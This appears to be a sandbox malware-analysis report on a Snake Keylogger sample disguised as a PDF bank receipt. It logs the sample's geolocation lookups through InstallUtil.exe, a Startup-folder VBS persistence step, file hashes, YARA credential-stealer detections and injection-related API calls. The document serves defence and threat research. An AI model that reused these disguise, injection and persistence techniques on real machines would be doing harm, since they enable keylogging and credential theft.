                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78a91cd0a2f4-YUL
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=245382&cwnd=32&unsent_bytes=0&cid=135ae0614616149e&ts=425&x=0"
                                                              2024-11-11 04:17:13 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.549746188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:14 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:14 UTC855INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:14 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 17
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQc%2BIGxJpoQFS14jShoxrq5X%2FFtNAFRHQtPdNvIEyczpJLwsiaTfSUIAwXtc%2BtXPRH%2B2PuMZ4hYPVAB9SH7mYARqggCAK5Uef%2Fo9jkcX0i8%2F9nIWrTD1pBCeQO76mOPpX%2FuBMfjk"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78b27a198ca8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1280&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2303898&cwnd=244&unsent_bytes=0&cid=2edb24f00ba2fb91&ts=115&x=0"
                                                              2024-11-11 04:17:14 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.549758188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:15 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:15 UTC843INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:15 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 18
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goPv7p0fAuMrdMRK50qFX83AO931Pzn%2ByvgyaopWiHTT97b1Pb5ALhXGgrlb9ZwaxDFZQ3yO5JSnkuDiUs5JjovDpTdEQCPbUSrCMz6PTgn3xApM1TpbEcBaHU61mIQxYLRo8T9G"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78ba1c640caa-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2462585&cwnd=233&unsent_bytes=0&cid=cc2bb256f4e014e6&ts=139&x=0"
                                                              2024-11-11 04:17:15 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.549770188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:17 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:17 UTC849INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:17 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 20
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGqpQFMiUhkHmuT7WMvnFsFJYypEBR%2FVet03ic9B03mMNVGcIi1FbEBonHvuQNhuRrQ6RSFC417kpD%2Fd5Mh0pkEGJjHu6HZ%2F%2FNb4qX0xBmadOfdukd82T1vL5JzhEn03QucZWcnW"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78c1cbc41881-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1181&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2576512&cwnd=241&unsent_bytes=0&cid=2205a1b269aa3e65&ts=110&x=0"
                                                              2024-11-11 04:17:17 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.549782188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:18 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:18 UTC847INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:18 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 21
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dzoSVb%2B7Vj3jIbEp5ZkZd0HECoiSXMz6edX%2FiC3XTh0j6tz8Hl0XkWM1JuoYF0CeIZFPFQgFetVez0eGEAY3bryuNH6ugLB%2Fk1KaBvLTLEHTxNzKUG7mxbFcLeEqgfjsIvF3aDbz"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78c94fa2c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2540350&cwnd=250&unsent_bytes=0&cid=f7b2e116e6f8d09a&ts=109&x=0"
                                                              2024-11-11 04:17:18 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.549794188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:19 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:19 UTC847INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:19 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 22
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROsmEE143iknoMbtBgvROy4maWYjpFkW0fzo4kV%2F6oFlMXzGysURWr%2BXVDKVilep5qtfxeuI2b8sGSB8ADuTAOpNMF8dIioNL9Fs7OxyVHxxVr%2FVwktc6qh4oYTUPucfikjs4n1G"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78d0c935de92-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1260&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2339256&cwnd=245&unsent_bytes=0&cid=6f24d540883204db&ts=118&x=0"
                                                              2024-11-11 04:17:19 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:23:16:51
                                                              Start date:10/11/2024
                                                              Path:C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe"
                                                              Imagebase:0xab0000
                                                              File size:1'250'816 bytes
                                                              MD5 hash:D99D18DBD5825F0FDDEF9063B0AFDF9C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2052275949.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:23:16:54
                                                              Start date:10/11/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                              Imagebase:0x640000
                                                              File size:42'064 bytes
                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4478272423.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:3
                                                              Start time:23:17:04
                                                              Start date:10/11/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs"
                                                              Imagebase:0x7ff79f9e0000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:23:17:05
                                                              Start date:10/11/2024
                                                              Path:C:\Users\user\AppData\Roaming\TypeName.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Roaming\TypeName.exe"
                                                              Imagebase:0xc50000
                                                              File size:1'250'816 bytes
                                                              MD5 hash:D99D18DBD5825F0FDDEF9063B0AFDF9C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 11%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:23:17:08
                                                              Start date:10/11/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                              Imagebase:0xfb0000
                                                              File size:42'064 bytes
                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:9.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:3.7%
                                                                Total number of Nodes:243
                                                                Total number of Limit Nodes:8
                                                                execution_graph 57843 6c30a43 57844 6c30a4d 57843->57844 57848 6adab88 57844->57848 57852 6adab83 57844->57852 57845 6c3008f 57849 6adab9d 57848->57849 57856 6adb063 57849->57856 57853 6adab88 57852->57853 57855 6adb063 2 API calls 57853->57855 57854 6adabb3 57854->57845 57855->57854 57858 6adb08a 57856->57858 57857 6adabb3 57857->57845 57858->57857 57861 6c86a08 57858->57861 57865 6c86a10 57858->57865 57862 6c86a0d VirtualProtect 57861->57862 57864 6c86a93 57862->57864 57864->57858 57866 6c86a58 VirtualProtect 57865->57866 57868 6c86a93 57866->57868 57868->57858 57909 6c85798 57910 6c857e6 NtProtectVirtualMemory 57909->57910 57912 6c85830 57910->57912 57869 6c302d2 57870 6c302dc 57869->57870 57874 6c8c8b0 57870->57874 57878 6c8c8a1 57870->57878 57871 6c3031a 57875 6c8c8c5 57874->57875 57876 6c8c8db 57875->57876 57882 6c8ddc2 57875->57882 57876->57871 57879 6c8c8b0 57878->57879 57880 6c8ddc2 2 API calls 57879->57880 57881 6c8c8db 57879->57881 57880->57881 57881->57871 57883 6c8f2c6 57882->57883 57887 5991429 57883->57887 57892 5991438 57883->57892 57888 5991438 57887->57888 57897 6c880b8 57888->57897 57901 6c880ba 57888->57901 57893 599144d 57892->57893 57895 6c880b8 CopyFileA 57893->57895 57896 6c880ba CopyFileA 57893->57896 57894 599146b 57895->57894 57896->57894 57898 6c8810d CopyFileA 57897->57898 57900 6c8820f 57898->57900 57902 6c8810d CopyFileA 57901->57902 57904 6c8820f 57902->57904 57913 2e13cb0 57914 2e13ccc 57913->57914 57915 2e13cdc 57914->57915 57919 6cf7a14 57914->57919 57923 6cf2272 57914->57923 57926 6cf2ea3 57914->57926 57920 6cf7a33 57919->57920 57929 6cfd9a0 57920->57929 57925 6cfd9a0 VirtualProtect 57923->57925 57924 6cf01da 57925->57924 57928 6cfd9a0 VirtualProtect 57926->57928 57927 6cf2ebe 57928->57927 57930 6cfd9c7 57929->57930 57933 6cfddf0 57930->57933 57934 6cfde38 VirtualProtect 57933->57934 57936 6cf01da 57934->57936 57937 6c30ab7 